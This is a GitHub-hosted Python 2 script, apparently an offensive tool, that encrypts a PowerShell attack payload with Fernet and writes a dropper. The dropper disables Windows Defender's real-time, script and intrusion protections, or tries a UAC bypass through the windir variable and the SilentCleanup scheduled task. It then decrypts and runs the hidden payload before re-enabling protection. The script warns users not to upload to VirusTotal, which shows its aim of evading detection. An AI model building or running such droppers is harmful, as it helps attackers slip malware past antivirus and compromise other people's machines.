-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathpspyfernet_obs.py
153 lines (123 loc) · 9.71 KB
/
pspyfernet_obs.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
#!/usr/local/bin/python
# coding: latin-1
#@Author :#Captain_Nemo
from cryptography.fernet import Fernet
import os
import sys
import random
import time
import subprocess
class bcolors:
BLUE = '\033[94m'
GREEN = '\033[92m'
WARNING = '\033[93m'
WHITE = '\033[97m'
ERROR = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
with open(sys.argv[1], 'r+') as f:
contents = f.read()
banner = '''
█████████████████████████████
█████████████████████████████
████ ▄▄▄▄▄ █ ▄ █ █ ▄▄▄▄▄ ████
████ █ █ █ ▀▀ ██ █ █ ████
████ █▄▄▄█ █▀▀█▀ █ █▄▄▄█ ████
████▄▄▄▄▄▄▄█▄▀ █▄█▄▄▄▄▄▄▄████
████▄ █▀▄ ▄██▄██▄██▄▀▄▄▄ ████
████▀▀▄▄▀ ▄▀▀ █▀█ █▀▀▀▀████
████████▄▄▄▄▀█▀█ ▄ ▀█ █████
████ ▄▄▄▄▄ █▀▄▄ █▀█▀ ▀█▄████
████ █ █ █▄█▀ ▄▀▄█▀▀▀ ▀████
████ █▄▄▄█ █▀▄█ ▄█ █▄▄▀█▀████
████▄▄▄▄▄▄▄█▄▄▄███▄██▄█▄▄████
█████████████████████████████
█████████████████████████████
'''
print banner.decode('utf-8')
print bcolors.BOLD + bcolors.WHITE + " [+] Author :#Captain_Nemo"
print bcolors.BOLD + bcolors.WHITE + " [+] HACK-ATHON BOOK OF WISDOM "
print bcolors.BOLD + bcolors.WHITE + " [+] YOUTUBE CHANNEL : https://www.youtube.com/channel/UCA1eZ38TvjtyhpLtcZ9UHEQ"
print bcolors.BOLD + bcolors.WHITE + " [+] FACEBOOK : https://www.facebook.com/Hack-Athon-BOOK-of-Wisdom-1258144607678680"
print bcolors.BOLD + bcolors.WHITE + " [+] TWITTER : https://twitter.com/AthonOf"
print bcolors.BOLD + bcolors.WHITE + " [+] GITHUB : https://github.com/1captainnemo1"
#time.sleep(3)
print "\n\n\n"
print bcolors.BOLD + bcolors.WHITE + "[+] This Module will attempt to Obfuscate powershell Attack Vectors"
print bcolors.BLUE + "[+] Raw payload"
print " ============================================================================================="
print contents
print " ============================================================================================="
print bcolors.ERROR + bcolors.BOLD + "[+] Generating Fernet MultiKey"
key = Fernet.generate_key()
print bcolors.BOLD + bcolors.WHITE + "[+] Key = " + key
print bcolors.WHITE + "[+] Please make note of the Key for decryption"
print bcolors.BOLD + "[+] Generating Fernet Object....please wait"
f = Fernet(key)
print bcolors.BOLD + bcolors.WHITE + "[+] Fernet Object Generated at :"
print f
print bcolors.ERROR + bcolors.BOLD + "[+] Encrypting Payload"
time.sleep(2)
print bcolors.BOLD + bcolors.WHITE + "================================================================================="
enc_payload = f.encrypt(contents)
print bcolors.BOLD + bcolors.WHITE + "[+] Encrypted Payload : " + enc_payload
print bcolors.BOLD + bcolors.WHITE + "================================================================================="
print bcolors.ERROR + bcolors.BOLD + "[+] Writing RAW payload to file, Please wait"
Filename = "_PSRawPayload%i"%random.randint(1,10000000001)+".txt"
#print Filename # bookmark
f1 = open("_PSRawPayload%i"%random.randint(1,10000000001)+".txt", "a")
f1.write(enc_payload)
f1.close()
print bcolors.BOLD + bcolors.WHITE + "[+] Raw Encrypted Payload written to :" + f1.name
print bcolors.BLUE + bcolors.BOLD + "[+] Do You want to continue generating the Executable payload (Y/N)"
decision = str(raw_input("enter Y or N\n"))
if decision == 'N':
print bcolors.BOLD + bcolors.WHITE + "[+] Have a nice day !!"
print bcolors.BOLD + bcolors.WHITE + "[+] DO NOT UPLOAD TO VIRUSTOTAL !!!"
sys.exit(0)
elif decision == 'Y':
# Create final Obfuscated Executable Python payload
print bcolors.BOLD + bcolors.WHITE + "[+] Generating Final Obfuscated python Payload, Please wait"
time.sleep(2)
final_payload = open("PSFinalPayload%i"%random.randint(1,10000000001)+".py", "w")
final_payload.write("""
from cryptography.fernet import Fernet
import os
import sys
import subprocess
import time
key = """ + "\'"+key+"\'")
final_payload.write("""
f_obj= Fernet(key)
enc_pay =""" "\'"+enc_payload+"\'")
final_payload.write("""
#Disable Notification
#subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HKCU:\Software\Policies\Microsoft\Windows\Explorer -Name DisableNotificationCenter -Type #DWord -Value 1 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-#ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])
#subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HCKU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications -Name ToastEnabled -#Type DWord -Value 0 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" #Set-ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])
#time.sleep(20)
#Disable AV
subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', 'if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")){Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true}else{$registryPath = "HKCU:\Environment";$Name = "windir" ;$Value = "powershell -ep bypass -w h $PSCommandPath";Set-ItemProperty -Path $registryPath -Name $name -Value $Value;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null ; Remove-ItemProperty -Path $registryPath -Name $name}'])
time.sleep(90)
subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', f_obj.decrypt(enc_pay).decode()])
time.sleep(90)
#Enable AV
subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', 'if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")){Set-MpPreference -DisableIntrusionPreventionSystem $false -DisableIOAVProtection $false -DisableRealtimeMonitoring $false -DisableScriptScanning $false}else{$registryPath = "HKCU:\Environment";$Name = "windir" ;$Value = "powershell -ep bypass -w h $PSCommandPath";Set-ItemProperty -Path $registryPath -Name $name -Value $Value;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null ; Remove-ItemProperty -Path $registryPath -Name $name}'])
#Enable notification
#subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HKCU:\Software\Policies\Microsoft\Windows\Explorer -Name DisableNotificationCenter -Type #DWord -Value 0 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-#ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])
#subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HCKU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications -Name ToastEnabled -#Type DWord -Value 1 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" #Set-ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])
""")
final_payload.close()
print bcolors.BOLD + bcolors.WHITE + "[+] Final Encrypted encrypted Powershell Python Payload written to : " + final_payload.name
print bcolors.BLUE + bcolors.BOLD + "[+] HACK THE MULTIVERSE "
decr = 5
while True:
print bcolors.ERROR + bcolors.BOLD + "[+] DO NOT UPLOAD TO VIRUSTOTAL"
decr = decr-1
if(decr <=0):
break
sys.exit(0)
else:
sys.exit(0)
print bcolors.ERROR + bcolors.BOLD + "[+] Respond in Y or N ONLY"
sys.exit(0)